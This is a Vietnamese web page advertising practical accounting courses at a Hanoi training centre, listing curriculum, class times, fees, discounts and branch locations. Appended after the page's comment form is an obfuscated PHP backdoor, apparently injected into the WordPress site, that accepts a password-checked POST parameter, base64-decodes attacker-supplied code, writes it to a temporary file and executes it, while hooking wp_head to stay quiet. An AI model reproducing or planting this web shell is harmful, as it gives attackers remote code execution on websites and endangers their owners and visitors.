1

Lớp học kế toán thực tế tại Đống Đa, Ba Đình Hà Nội

KHÓA HỌC KẾ TOÁN KÈM RIÊNG THEO YÊU CẦU 1-1 xem ngay

KHÓA HỌC KẾ TOÁN NỘI BỘ CẤP TỐC ONLINE xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

Lớp học kế toán thực tế tại Đống Đa, Ba Đình, Hai Bà Trưng. Trung tâm dạy thực hành kế toán tốt nhất tại Hà Nội để đi làm

Với nhu cầu tuyển dụng kế toán chưa bao giờ là lỗi thời hay suy giảm, kế toán luôn là một ngành học một nghề Hot và cần nhiều nhân lực nhất. Trong khi đó sinh viên học kế toán ra lại vẫn bị thất nghiệp? Lý do là vì sao? Để trả lời cho những yếu tố đó thì chúng tôi đưa ra các lý do như sau:
Sinh viên khi tốt nghiệp kiến thức thực tế hầu như là con số không? Sinh viên học trong trường lớp mới chỉ học qua lý thuyết chưa hề được thực hành hay tiếp xúc làm việc trên máy với các bộ hóa đơn thực tế. Do đó khi ra trường nhu cầu tìm học một khóa kế toán thực hành thực tế hoàn toàn là một điều dễ hiểu?

Đối với cả những ai đang làm kế toán nhưng các bạn đã nghỉ làm một thời gian vì nhiều lý do cá nhân hay các bạn chưa tự tin về Thuế, Hạch toán, BCTC…Các bạn muốn nắm vững hơn những kỹ năng giải trình, thủ thuật???
Mời các bạn tham gia ngay khóa học kế toán tại Đống Đa, Ba Đình – Hà Nội.

lop-hoc-ke-toan

Khi đăng ký khóa học tại trung tâm các bạn được xếp lớp ngay trong tuần không phải đợi lớp. Trung tâm đào tạo kế toán Hà Nội mở lớp liên tục với khóa: học toán thực tế tại Đống Đa, học kế toán tại Ba Đình, học kế toán tại Cầu Giấy, học kế toán tại Thanh Xuân… Học viên được làm những công việc thực thụ của một kế toán, xử lý các tình huống thực tế phát sinh tại doanh nghiệp, được giảng viên kèm cặp giảng dạy theo phương pháp Cầm Tay Chỉ Việc, học viên được hỏi đáp trao đổi trong các buổi học như vậy học viên được trải qua nhiều loại hình nhiều tình huống của từng phần hành giúp học viên nâng cao kỹ năng nghiệp vụ hơn.

Nội dung lớp học kế toán thực tế tại Đống Đa như sau:

Với học viên chưa biết gì về kế toán :

 • Sẽ được dạy tổng hợp từ đầu, học từ cơ bản tới nâng cao từ những kiến thức cơ bản nhất về kế toán như : Nguyên lý kế toán , hệ thống tài khoản , chứng từ , sổ sách kế toán , phương pháp định khoản, sơ đồ kế toán….đến khi học viên lên được BCTC.
 • Khi học viên đã nắm vững nguyên lý các bạn sẽ được học thực hành bằng tay trên máy theo nội dung thực hành chuyên sâu.

Đối với những bạn đã học qua kế toán:

 • Các bạn sinh viên , các kế toán chưa có kinh nghiệm thực tế thì được vào học thực hành trên chứng từ (hóa đơn tài chính, giấy nộp tiền vào ngân sách nhà nước,… ) và các phần mềm kế toán theo đúng công việc của 1 người kế toán doanh nghiệp như: Tập hợp, phân loại chứng từ hợp lý, hợp lệ, hợp pháp -> Hạch toán các nghiệp vụ phát sinh (hướng dẫn ghi định khoản bằng bút chì trực tiếp trên chứng từ) – > Kê khai , lập báo thuế theo tháng, quý , năm ( Thuế môn bài, Thuế GTGT , TNCN , tạm tính thuế TNDN )
 • Học thực hành trên máy và trên phần mềm HTKK ( hỗ trợ kê khai thuế của tổng cục thuế) – > Mở sổ sách – > Lên sổ sách trên phần mềm kế toán ( Excel, Misa,… ) -> Hoàn thiện các bút toán kết chuyển, cân đối doanh thu chi phí, kiểm tra sai sót, mối quan hệ từng tài khoản – > Lập báo cáo tài chính : Báo cáo quyết toán thuế , Bảng cân đối kế toán, bảng lưu chuyển tiền tệ, bảng thuyết minh báo cáo tài chính, bảng kết quả hoạt động kinh doanh.
 • Các sai phạm mà kế toán và doanh nghiệp thường gặp phải – > Cách điều chỉnh sai sót và khắc phục

Thời gian học và học phí:

 • Thời gian học linh động có 3 ca: Sáng-Chiều-Tối phù hợp với mọi đối tượng
 • Ca sáng : Từ 8h – 11h . Ca Chiều : Từ 14h – 15h . Ca Tối : Từ 18h – 20
 • Học từ thứ 2 – thứ 7. Tổng số buổi học từ 25-35 buổi với từng đối tượng Thời Gian Thực Hành Trên Máy Là Không Giới Hạn
 • Học phí hợp lý : Học viên đã học kế toán khi học tổng hợp là 3,6 triệu, học viên chưa học kế toán khi học tổng hợp là 4,5 triệu. Học phí bao gồm trọn gói hết tài liệu và chứng chỉ, cam kết không có phát sinh thêm

+ GIẢM 40% HỌC PHÍ CHO SINH VIÊN

+ GIẢM 30% HỌC PHÍ CHO CÁC ĐỐI TƯỢNG KHÁC

+ GIẢM THÊM 10%/HV KHI ĐĂNG KÝ TỪ 2 NGƯỜI TRỞ LÊN

Liên hệ: Tel – 0973 761 751 – (Mr Ngọc)
Địa chỉ học kế toán ở đâu tốt  Hà Nội: học kế toán ở Hà Đông, học kế toán tại gia lâm, học kế toán tại từ liêm

TRUNG TÂM ĐÀO TẠO KẾ TOÁN HÀ NỘI
CÔNG TY CỔ PHẦN NGHIÊN CỨU VÀ HỖ TRỢ DOANH NGHIỆP HÀ NỘI
_______________

CƠ SỞ ĐÀO TẠO TẠI HÀ NỘI:
CS1: Lê Trọng Tấn – Thanh Xuân – Hà Nội.
CS2: Lê Đức Thọ – Từ Liêm – Hà Nội.
CS3: KĐT Việt Hưng – Long Biên – Hà Nội.
CS4: Quang Trung – Hà Đông – Hà Nội.
CS5: Minh Khai – Hoàng Mai – Hà Nội
CS6: Nguyễn Chí Thanh – Đống Đa – Hà Nội
CS7: Cổ Bi – Gia Lâm – Hà Nội
CƠ SỞ ĐÀO TẠO TẠI MIỀN BẮC:
Bắc Ninh – Hải Phòng – Quảng Ninh – Thái Bình – Phú Thọ – Hà Nam – Thái Nguyên – Vĩnh Phúc – Bắc Ninh – Ninh Bình – Hải Dương – Hưng Yên

CƠ SỞ ĐÀO TẠO TẠI MIỀN TRUNG – NAM:
Nghệ An – Hà Tĩnh – Đà Nẵng – Bình Dương – Quận 3 – Tân Phú – Q. Thủ Đức – Đồng Nai – Vũng Tàu – Tiền Giang – Kiên Giang – Cần Thơ

LỚP TIN HỌC VĂN PHÒNG CƠ BẢNxem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁNxem ngay

KHÓA HỌC KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆPxem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Leave a Reply

  Your email address will not be published. Required fields are marked *

  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}